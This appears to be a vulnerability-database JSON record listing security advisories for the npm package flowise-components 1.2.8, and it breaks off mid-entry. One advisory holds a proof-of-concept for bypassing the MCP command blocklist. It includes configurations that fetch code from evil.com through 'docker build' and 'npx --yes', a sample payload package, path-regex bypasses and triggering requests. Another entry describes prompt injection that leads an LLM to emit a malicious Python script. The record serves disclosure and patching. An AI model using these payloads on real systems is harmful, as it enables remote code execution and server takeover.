{"url":"http://public2.vulnerablecode.io/api/packages/793003?format=json","purl":"pkg:npm/flowise-components@1.2.8","type":"npm","namespace":"","name":"flowise-components","version":"1.2.8","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"3.1.2","latest_non_vulnerable_version":"3.1.2","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/65503?format=json","vulnerability_id":"VCID-19jc-umg6-v7ce","summary":"Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, multiple tool implementations directly import and invoke raw HTTP clients (node-fetch, axios) instead of using the secured wrapper. These tools include (1) OpenAPIToolkit/OpenAPIToolkit.ts, (2) WebScraperTool/WebScraperTool.ts, (3) MCP/core.ts, and (4) Arxiv/core.ts. This vulnerability is fixed in 3.1.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43995","reference_id":"","reference_type":"","scores":[{"value":"0.00066","scoring_system":"epss","scoring_elements":"0.20656","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00092","scoring_system":"epss","scoring_elements":"0.26147","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00092","scoring_system":"epss","scoring_elements":"0.26132","published_at":"2026-06-14T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43995"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43995","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43995"},{"reference_url":"https://github.com/advisories/GHSA-qqvm-66q4-vf5c","reference_id":"GHSA-qqvm-66q4-vf5c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qqvm-66q4-vf5c"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-qqvm-66q4-vf5c","reference_id":"GHSA-qqvm-66q4-vf5c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:19:54Z/"}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-qqvm-66q4-vf5c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373260?format=json","purl":"pkg:npm/flowise-components@3.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-cb6d-4c2v-w7c3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@3.1.0"}],"aliases":["CVE-2026-43995","GHSA-qqvm-66q4-vf5c"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-19jc-umg6-v7ce"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/80896?format=json","vulnerability_id":"VCID-1xfp-4rtg-4bcu","summary":"Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, there is a remote code execution vulnerability in AirtableAgent.ts caused by lack of input verification when using Pandas. The user’s input is directly applied to the question parameter within the prompt template and it is reflected to the Python code without any sanitization. This vulnerability is fixed in 3.1.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41138","reference_id":"","reference_type":"","scores":[{"value":"0.00575","scoring_system":"epss","scoring_elements":"0.69337","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00575","scoring_system":"epss","scoring_elements":"0.69236","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00575","scoring_system":"epss","scoring_elements":"0.6934","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00575","scoring_system":"epss","scoring_elements":"0.69328","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41138"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41138","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41138"},{"reference_url":"https://github.com/advisories/GHSA-f228-chmx-v6j6","reference_id":"GHSA-f228-chmx-v6j6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f228-chmx-v6j6"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-f228-chmx-v6j6","reference_id":"GHSA-f228-chmx-v6j6","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T14:18:47Z/"}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-f228-chmx-v6j6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373260?format=json","purl":"pkg:npm/flowise-components@3.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-cb6d-4c2v-w7c3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@3.1.0"}],"aliases":["CVE-2026-41138","GHSA-f228-chmx-v6j6"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1xfp-4rtg-4bcu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/80773?format=json","vulnerability_id":"VCID-5pup-kgaf-3ubw","summary":"Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the specific flaw exists within the run method of the CSV_Agents class. The issue results from the lack of proper sandboxing when evaluating an LLM generated python script. An attacker can leverage this vulnerability to execute code in the context of the user running the server. Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the CSV Agent node may convince an LLM to respond with a malicious python script that executes attacker controlled commands on the Flowise server. This vulnerability is fixed in 3.1.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41264","reference_id":"","reference_type":"","scores":[{"value":"0.00215","scoring_system":"epss","scoring_elements":"0.4425","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00215","scoring_system":"epss","scoring_elements":"0.44238","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00215","scoring_system":"epss","scoring_elements":"0.44078","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00215","scoring_system":"epss","scoring_elements":"0.44231","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41264"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41264","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41264"},{"reference_url":"https://github.com/advisories/GHSA-3hjv-c53m-58jj","reference_id":"GHSA-3hjv-c53m-58jj","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3hjv-c53m-58jj"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3hjv-c53m-58jj","reference_id":"GHSA-3hjv-c53m-58jj","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T13:39:06Z/"}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3hjv-c53m-58jj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373260?format=json","purl":"pkg:npm/flowise-components@3.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-cb6d-4c2v-w7c3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@3.1.0"}],"aliases":["CVE-2026-41264","GHSA-3hjv-c53m-58jj"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5pup-kgaf-3ubw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/80932?format=json","vulnerability_id":"VCID-b97u-efzx-dffn","summary":"Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the GraphCypherQAChain node forwards user-provided input directly into the Cypher query execution pipeline without proper sanitization. An attacker can inject arbitrary Cypher commands that are executed on the underlying Neo4j database, enabling data exfiltration, modification, or deletion. This vulnerability is fixed in 3.1.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41274","reference_id":"","reference_type":"","scores":[{"value":"0.00232","scoring_system":"epss","scoring_elements":"0.46306","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00232","scoring_system":"epss","scoring_elements":"0.46303","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00232","scoring_system":"epss","scoring_elements":"0.46162","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00232","scoring_system":"epss","scoring_elements":"0.46317","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41274"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41274","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41274"},{"reference_url":"https://github.com/advisories/GHSA-28g4-38q8-3cwc","reference_id":"GHSA-28g4-38q8-3cwc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-28g4-38q8-3cwc"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-28g4-38q8-3cwc","reference_id":"GHSA-28g4-38q8-3cwc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-24T16:20:30Z/"}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-28g4-38q8-3cwc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373260?format=json","purl":"pkg:npm/flowise-components@3.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-cb6d-4c2v-w7c3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@3.1.0"}],"aliases":["CVE-2026-41274","GHSA-28g4-38q8-3cwc"],"risk_score":4.2,"exploitability":"0.5","weighted_severity":"8.4","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-b97u-efzx-dffn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360319?format=json","vulnerability_id":"VCID-cb6d-4c2v-w7c3","summary":"Flowise has an MCP Security Bypass that Enables RCE\n## Summary\nThere are three bypass methods for the security limitations of the Flowise MCP feature, and attackers can execute arbitrary commands by combining these three methods\n\n## Details\n\n\n### 【Vulnerability  one】The Docker build subcommand not being on the blocklist leads to remote code execution \n\nThe attacker configures the interface through the MCP tool to provide {\"command\":\"docker\",\"args\":[\"build\",\"https://evil.com/\"]} as the Custom MCP Server configuration \n→ Bypass the validateCommandFlags docker blocklist (only blocks run/exec/-v/--volume, etc., but does not block build)\n→ docker build <remote-URL> will pull the Dockerfile from the remote address and execute the RUN instructions within it\n→ Allows attackers to escape from Docker through methods such as mounting, thereby gaining full control of the Flowise host machine \n\nPrecondition: \n1. Have a Flowise account (any role, including regular users) or an API with view&update permissions for chatflows\n2. The deployment environment has the docker command\n\nVulnerable function - validateCommandFlags: \n\n```\nfile: packages/components/nodes/tools/MCP/core.ts:260-310\n\nconst COMMAND_FLAG_BLACKLIST: Record<string, string[]> = {\n    docker: [\n        'run', 'exec', '-v', '--volume', '--privileged', '--cap-add',\n        '--security-opt', '--network', '--pid', '--ipc'\n        //  'build', 'pull', 'push', 'cp', 'commit' are not on the blocklist \n    ],\n    npx: ['-c', '--call', '--shell-auto-fallback', '-y'],\n    npm: ['run', 'exec', 'install', '--prefix', '-g', '--global', 'publish', 'adduser', 'login'],\n    // ...\n}\nexport function validateCommandFlags(command: string, args: string[]): ValidationResult {\n    const blacklist = COMMAND_FLAG_BLACKLIST[command] || []\n    for (const arg of args) {\n        if (blacklist.includes(arg)) {\n            return { valid: false, error: `Argument '${arg}' is not allowed for command '${command}'` }\n        }\n    }\n    return { valid: true }\n}\n```\n\nReproduction process:\n\nAdd MCP config via UI or API interface, for example: \n\n<img width=\"1280\" height=\"414\" alt=\"2f0b6dfad5458616781921e1c28339d0\" src=\"https://github.com/user-attachments/assets/6c8419c5-6261-46bb-8a30-3ac1ec3fb599\" />\n\nThen execute: \n\n```\nPOST /api/v1/prediction/{chatflows_id} HTTP/1.1\nHost: 127.0.0.1:3000\nContent-Type: application/json\nAuthorization: Bearer apikey\nContent-Length: 17\n\n{\"question\": \"1\"}\n```\n\nAfter execution, the command can be triggered to execute docker build http://evil.com \n\n<img width=\"1280\" height=\"319\" alt=\"f98e1d91428be6077ac6cf0472285f17\" src=\"https://github.com/user-attachments/assets/856d46b4-7949-4091-bed9-a7c3fecc62f0\" />\n\nIf a privileged container is deployed, then it can fully control the Flowise host machine \n\n### 【Vulnerability  two】 npx --yes long parameter alias bypassing blocklist leads to remote code execution\n\nThe attacker configures the MCP tool to provide {\"command\":\"npx\",\"args\":[\"--yes\",\"malicious-package\"]} \n→ validateCommandFlags npx blocklist only contains short parameter -y, and does not block long parameter alias --yes\n→ npx --yes malicious-package automatically agrees to install and execute any npm package\n→ Leads to remote code execution (RCE) on the server \n\nPrecondition: \n1. Have a Flowise account (any role, including regular users) or an API with view&update permissions for chatflows\n2. The deployment environment has the npx command\n\nnpx blocklist:\n\n```\nfile: packages/components/nodes/tools/MCP/core.ts:270-280\n\nnpx: ['-c', '--call', '--shell-auto-fallback', '-y'],\n//    Only the short parameter -y is present, without the long parameter alias --yes\n```\n\nReproduction process:\nAdd MCP config via UI or API interface, for example: \n\n<img width=\"1910\" height=\"690\" alt=\"85ea14ea224df9ed501827dfa47afb09\" src=\"https://github.com/user-attachments/assets/8f3a2299-5460-4d23-b113-79ba4a9e52b6\" />\n\n```\n{\n  \"command\": \"npx\",\n  \"args\":[\"--yes\", \"http://evil.com/FileName.tar\"]\n}\n```\n\nContents of the tar file:\n\n```\n// index.js\n#!/usr/bin/env node\nconst http = require('http');\nconst { execSync } = require('child_process');\n\nconst result = execSync('id && hostname').toString().trim();\nconsole.error('[MCP-RCE-002] npx --yes bypass: ' + result);\n\n// package.json\n{\n  \"name\": \"attacker-mcp-pkg\",\n  \"version\": \"1.0.0\",\n  \"bin\": {\n    \"attacker-mcp-pkg\": \"./index.js\"\n  },\n  \"scripts\": {\n    \"postinstall\": \"\"\n  }\n}\n```\nThen execute: \n\n```\nPOST /api/v1/prediction/{chatflows_id} HTTP/1.1\nHost: 127.0.0.1:3000\nContent-Type: application/json\nAuthorization: Bearer apikey\nContent-Length: 17\n\n{\"question\": \"1\"}\n```\n\ncan trigger the vulnerability, execute the attacker's commands, and achieve RCE:\n\n<img width=\"3026\" height=\"256\" alt=\"4c466067deb4606a38e4b73806661328\" src=\"https://github.com/user-attachments/assets/e9821e3f-bda4-4c6a-bcd1-0b19053045c9\" />\n\n### node command bypassing local file restrictions leads to remote code execution\n\nWhen configuring the CustomMCP node, the attacker provides {\"command\":\"node\",\"args\":[\"local file\"]} \n→ Bypass the security restrictions of validateArgsForLocalFileAccess \n→ Node process loads local files and executes arbitrary code → RCE \n\nPrecondition: \nHave a Flowise account \n\nAnalysis of Vulnerable Code:\n\n```\n// packages/components/nodes/tools/MCP/core.ts:177-220\n\nexport const validateArgsForLocalFileAccess = (args: string[]): void => {\n    const dangerousPatterns = [\n        // Absolute paths\n        /^\\/[^/]/, // Unix absolute paths starting with /\n        /^[a-zA-Z]:\\\\/, // Windows absolute paths like C:\\\n\n        // Relative paths that could escape current directory\n        /\\.\\.\\//, // Parent directory traversal with ../\n        /\\.\\.\\\\/, // Parent directory traversal with ..\\\n        /^\\.\\./, // Starting with ..\n\n        // Local file access patterns\n        /^\\.\\//, // Current directory with ./\n        /^~\\//, // Home directory with ~/\n        /^file:\\/\\//, // File protocol\n\n        // Common file extensions that shouldn't be accessed\n        /\\.(exe|bat|cmd|sh|ps1|vbs|scr|com|pif|dll|sys)$/i,\n\n        // File flags and options that could access local files\n        /^--?(?:file|input|output|config|load|save|import|export|read|write)=/i,\n        /^--?(?:file|input|output|config|load|save|import|export|read|write)$/i\n    ]\n```\n\nThe above are the main restrictions imposed by the validateArgsForLocalFileAccess function, and it can be found that the regular expression \"/^\\/[^/]/\" has a matching issue \n\nAs the comment says, this regular expression essentially detects whether it is a Unix absolute path, which matches /etc/passwd but does not match //etc/passwd (the second character is '/') \n\n<img width=\"1280\" height=\"570\" alt=\"ea354264cbb2ace6a3a6a16e00f1d298\" src=\"https://github.com/user-attachments/assets/9ca88790-77ea-4d42-8910-09e4453f981a\" />\n\nTherefore, the limitation of this function can be bypassed by starting with //\n\n** Reproduction process: **\n\nCreate a new chatflow as follows:\n\n<img width=\"1280\" height=\"716\" alt=\"7e884613b5897509b39467f8f3b7aae1\" src=\"https://github.com/user-attachments/assets/478c7a89-4e77-4a5d-b063-de16cb640f92\" />\n\nAfter saving, cmd.js will be uploaded to the ~/.flowise/storage/{orgId}/{chatflow_id}/ directory\n\norgId can be obtained during login, and chatflow_id will also be returned when saving chatflow:\n\n<img width=\"1280\" height=\"702\" alt=\"48b5ab8412babba312f502be5db1dad3\" src=\"https://github.com/user-attachments/assets/090292cf-6361-43cd-91d7-eec6e578255b\" />\n\nFor example: \n```\n~/.flowise/storage/d2312f99-9043-413a-a1d2-3b7685a132b2/f8cc7f34-a1e5-4180-940a-47306d32adc2/cmd.js\n```\n\nSince paths like ~/ are restricted, and an absolute path needs to be obtained, use the following method:\n\n<img width=\"1280\" height=\"716\" alt=\"990e1c81ed3957c5ae823e55efec15a5\" src=\"https://github.com/user-attachments/assets/02c2a949-559a-4ee4-9675-c50a203d1e99\" />\n\n```\nPOST /api/v1/export-import/import  HTTP/1.1\nHost: 127.0.0.1:3000\nContent-Type: application/json\nx-request-from: internal\nCookie: cookie\nConnection: keep-alive\nContent-Length: 479\n\n {\n    \"ChatMessage\": [\n      {\n        \"id\": \"11111111-2222-4333-8444-555555555555\",\n        \"role\": \"userMessage\",\n        \"chatflowid\": \"{chatflow_id}\",\n        \"content\": \"seed for home path test\",\n        \"chatType\": \"EXTERNAL\",\n        \"chatId\": \"audit-home-001\",\n        \"createdDate\": \"2026-03-04T06:40:00.000Z\",\n        \"fileUploads\": \"[{\\\"type\\\":\\\"stored-file\\\",\\\"name\\\":\\\"poc.txt\\\",\\\"mime\\\":\\\"text/plain\\\"}]\"\n      }\n    ]\n  }\n```\n\n\n<img width=\"1280\" height=\"748\" alt=\"d7f947940f4e6b6e95a61bcc301c25c0\" src=\"https://github.com/user-attachments/assets/482fb78c-dbc8-4a0d-a042-4c993e976f10\" />\n\n```\nPOST /api/v1/export-import/chatflow-messages HTTP/1.1\nHost: 127.0.0.1:3000\nContent-Type: application/json\nx-request-from: internal\nCookie: cookie\nConnection: keep-alive\nContent-Length: 57\n\n{\"chatflowId\":\"{chatflow_id}\"}\n\n```\n\nAfter obtaining the absolute path, simply modify the path in args to the path of the file name: \n\n```\n  {\n    \"command\": \"node\",\n    \"args\": [\"//root/.flowise/storage/d2312f99-9043-413a-a1d2-3b7685a132b2/f8cc7f34-a1e5-4180-940a-47306d32adc2/cmd.js\"]\n  }\n```\n\nAfter saving, execution will trigger RCE \n\n\n```\nPOST /api/v1/prediction/{chatflows_id} HTTP/1.1\nHost: 127.0.0.1:3000\nContent-Type: application/json\nAuthorization: Bearer apikey\nContent-Length: 17\n\n{\"question\": \"1\"}\n```\n\n## Impact\n\nThis vulnerability allows attackers to execute arbitrary commands on the Flowise server .","references":[{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-m99r-2hxc-cp3q","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-m99r-2hxc-cp3q"},{"reference_url":"https://github.com/advisories/GHSA-m99r-2hxc-cp3q","reference_id":"GHSA-m99r-2hxc-cp3q","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m99r-2hxc-cp3q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/375703?format=json","purl":"pkg:npm/flowise-components@3.1.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@3.1.2"}],"aliases":["GHSA-m99r-2hxc-cp3q"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cb6d-4c2v-w7c3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71348?format=json","vulnerability_id":"VCID-dtss-epth-z7fh","summary":"Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.0.13, Flowise exposes an HTTP Node in AgentFlow and Chatflow that performs server-side HTTP requests using user-controlled URLs. By default, there are no restrictions on target hosts, including private/internal IP ranges (RFC 1918), localhost, or cloud metadata endpoints. This enables Server-Side Request Forgery (SSRF), allowing any user interacting with a publicly exposed chatflow to force the Flowise server to make requests to internal network resources that are inaccessible from the public internet. This vulnerability is fixed in 3.0.13.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31829","reference_id":"","reference_type":"","scores":[{"value":"0.00103","scoring_system":"epss","scoring_elements":"0.27704","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00103","scoring_system":"epss","scoring_elements":"0.27905","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00103","scoring_system":"epss","scoring_elements":"0.27931","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00103","scoring_system":"epss","scoring_elements":"0.27921","published_at":"2026-06-14T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31829"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31829","reference_id":"CVE-2026-31829","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31829"},{"reference_url":"https://github.com/advisories/GHSA-fvcw-9w9r-pxc7","reference_id":"GHSA-fvcw-9w9r-pxc7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fvcw-9w9r-pxc7"},{"reference_url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-fvcw-9w9r-pxc7","reference_id":"GHSA-fvcw-9w9r-pxc7","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-11T14:15:56Z/"}],"url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-fvcw-9w9r-pxc7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40666?format=json","purl":"pkg:npm/flowise-components@3.0.13","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise-components@3.0.13"}],"aliases":["CVE-2026-31829","GHSA-fvcw-9w9r-pxc7"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dtss-epth-z7fh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/80615?format=json","vulnerability_id":"VCID-e65e-s5sd-kuhp","summary":"Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the core security wrappers (secureAxiosRequest and secureFetch) intended to prevent Server-Side Request Forgery (SSRF) contain multiple logic flaws. These flaws allow attackers to bypass the allow/deny lists via DNS Rebinding (Time-of-Check Time-of-Use) or by exploiting the default configuration which fails to enforce any deny list. This vulnerability is fixed in 3.1.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41272","reference_id":"","reference_type":"","scores":[{"value":"0.00083","scoring_system":"epss","scoring_elements":"0.24454","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00083","scoring_system":"epss","scoring_elements":"0.24258","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00083","scoring_system":"epss","scoring_elements":"0.24447","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00083","scoring_system":"epss","scoring_elements":"0.24464","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41272"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41272","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41272"},{"reference_url":"https://github.com/advisories/GHSA-2x8m-83vc-6wv4","reference_id":"GHSA-2x8m-83vc-6wv4","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2x8m-83vc-6w